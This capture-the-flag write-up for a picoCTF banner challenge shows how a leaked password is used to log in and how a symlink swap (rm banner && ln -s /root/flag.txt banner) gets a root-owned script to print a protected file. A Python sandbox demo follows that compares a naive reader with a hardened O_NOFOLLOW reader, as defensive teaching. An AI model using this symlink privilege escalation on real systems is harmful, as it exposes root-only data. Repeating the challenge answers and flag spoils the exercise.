Description
Can you abuse the banner? The server has been leaking crucial information on tethys.picoctf.net <PORT1_FROM_INSTANCE>. Use the leak to reach the real service on tethys.picoctf.net <PORT2_FROM_INSTANCE>, then abuse the machine and grab the flag from /root.
Setup
Two netcat sessions
Connect to tethys.picoctf.net <PORT1_FROM_INSTANCE> to capture the leaked SSH banner.
Use tethys.picoctf.net <PORT2_FROM_INSTANCE> (the real service) for authentication and exploitation.
nc tethys.picoctf.net <PORT1_FROM_INSTANCE>
nc tethys.picoctf.net <PORT2_FROM_INSTANCE>
Solution
- Step 1: Harvest the password. The leaking service on port <PORT1_FROM_INSTANCE> prints an SSH banner that includes the password (e.g., My_Passw@rd_@1234). Record it for the next step.
nc tethys.picoctf.net <PORT1_FROM_INSTANCE>
- Step 2: Authenticate on the real service. Connect to port <PORT2_FROM_INSTANCE>, supply the leaked password, and answer the two security trivia questions (the answers are DEFCON and John Draper). You land in /home/player as an unprivileged user.
nc tethys.picoctf.net <PORT2_FROM_INSTANCE>
- Step 3: Abuse the banner reader. A root-owned script reads /home/player/banner, a file that lives in a directory the player can write to, and it follows symlinks when it opens that file. Replace banner with a symlink to /root/flag.txt so that the next login renders the flag as the banner:
cd /home/player && rm banner && ln -s /root/flag.txt banner
Reconnect to port <PORT2_FROM_INSTANCE> and log in again; when the root-owned script loads the banner, it prints the contents of /root/flag.txt.
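Why Step 3 works, as an added illustration that is not part of this writeup and not the challenge's own script (the page never shows that script): a minimal privileged banner reader that open()s a user-controlled path and follows the symlink, beside a hardened reader that opens with O_NOFOLLOW and checks the file's type and owner on the open descriptor. Everything here is constructed for an offline run: a temporary sandbox stands in for /root/flag.txt and /home/player/banner, the flag text is a placeholder, and the current user's UID stands in for root's because the sandbox files are owned by whoever runs the demo.

```python
import os
import stat
import tempfile

# Constructed sandbox standing in for /root/flag.txt and /home/player/banner.
# The paths and the flag string are assumptions for this demo, not the
# challenge's real files.
DEMO_FLAG = "picoCTF{constructed_demo_flag}\n"
DEMO_BANNER = "Welcome to the server\n"


def make_sandbox():
    """Create <tmp>/root/flag.txt and <tmp>/home/player/banner; return both paths."""
    base = tempfile.mkdtemp(prefix="banner-demo-")
    root_dir = os.path.join(base, "root")
    home_dir = os.path.join(base, "home", "player")
    os.makedirs(root_dir)
    os.makedirs(home_dir)
    flag_path = os.path.join(root_dir, "flag.txt")
    banner_path = os.path.join(home_dir, "banner")
    with open(flag_path, "w") as f:
        f.write(DEMO_FLAG)
    with open(banner_path, "w") as f:
        f.write(DEMO_BANNER)
    return flag_path, banner_path


def naive_banner(path):
    """The vulnerable pattern: a privileged process open()s a file that sits in a
    directory the unprivileged user controls. open() follows symlinks, so whatever
    the user points 'banner' at is read with the privileged process's rights."""
    with open(path) as f:
        return f.read()


def safe_banner(path, expected_uid):
    """Hardened reader. O_NOFOLLOW makes the open fail with ELOOP if the final
    path component is a symlink, and fstat on the already-open descriptor (rather
    than a separate lstat before opening) avoids a check-then-use race. The owner
    check uses expected_uid; a real deployment would pass 0 for root, and better
    still would not read from a user-writable directory at all."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd) as f:
        st = os.fstat(f.fileno())
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if st.st_uid != expected_uid:
            raise PermissionError(f"{path}: owned by uid {st.st_uid}, expected {expected_uid}")
        return f.read()


def demo():
    """Run the Step 3 attack against both readers. Returns (banner before the
    attack, what the naive reader leaks afterwards, whether the hardened reader refused)."""
    flag_path, banner_path = make_sandbox()
    before = naive_banner(banner_path)
    # Step 3 of the writeup: rm banner && ln -s /root/flag.txt banner
    os.remove(banner_path)
    os.symlink(flag_path, banner_path)
    leaked = naive_banner(banner_path)  # the naive reader follows the link
    try:
        # os.getuid() stands in for root's uid 0 because we own the sandbox files.
        safe_banner(banner_path, expected_uid=os.getuid())
        refused = False
    except OSError:  # ELOOP from O_NOFOLLOW (PermissionError is also an OSError)
        refused = True
    return before, leaked, refused


def safe_reader_accepts_legit_banner():
    """Sanity check: the hardened reader still serves a regular banner it owns."""
    _, banner_path = make_sandbox()
    return safe_banner(banner_path, expected_uid=os.getuid())


if __name__ == "__main__":
    before, leaked, refused = demo()
    print("banner before attack:", before.strip())
    print("naive reader returned:", leaked.strip())
    print("hardened reader refused symlink:", refused)
```

O_NOFOLLOW only protects the last path component: if the player could replace a parent directory with a symlink, the hardened reader would still walk through it, which is why the real fix is to keep privileged readers out of user-writable trees entirely rather than to bolt checks onto the open.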
Flag
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_8126...}
Once the root-owned script reads the symlinked banner, the flag is printed in place of the usual banner text.